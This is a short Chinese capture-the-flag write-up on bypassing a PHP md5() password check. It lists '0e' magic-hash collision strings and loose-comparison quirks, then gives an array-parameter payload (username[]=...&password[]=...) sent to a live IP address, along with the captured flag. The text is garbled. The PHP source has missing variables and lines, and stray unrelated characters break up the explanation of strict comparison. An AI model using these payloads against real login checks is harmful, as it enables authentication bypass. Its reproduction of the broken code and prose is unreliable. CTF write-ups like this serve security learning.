md5()函數
md5()函數
50
http://123.206.87.240:9009/18.php
<?php
error_reporting(0);
_GET['username']) and isset(
_GET['username'] ==
_GET['username']) === md5(
flag);
else
print 'Invalid password';
}
?>
1.md5 0e類型缺陷
列舉一下0ed+類型字符串
var_dump(md5('240610708') == md5('QNKCDZO'));
var_dump(md5('aabg7XSs') == md5('aabC9RqS'));
var_dump(sha1('aaroZmOk') == sha1('aaK1STfY'));
var_dump(sha1('aaO8zKZF') == sha1('aa3OFF9m'));
var_dump('0010e2' == '1e3');
var_dump('0x1234Ab' == '1193131');
var_dump('0xABCdef' == ' 0xABCdef');
中間沒仔細看 發(fā)現是 ===
搜了一下
b 全等 TRUE蝙砌,如果
b蠢古,并且它們的類型也相同口锭。
所以簡單的0e缺陷行不通赴精,
2.php特性漏洞(不能處理數組)
于是利用php特性不能處理數組
構造 username[]=wu&password[]=kong
即 http://123.206.87.240:9009/18.php?username[]=wu&password[]=kong
得到 Flag: flag{bugk1u-ad8-3dsa-2}
參考 php-MD5漏洞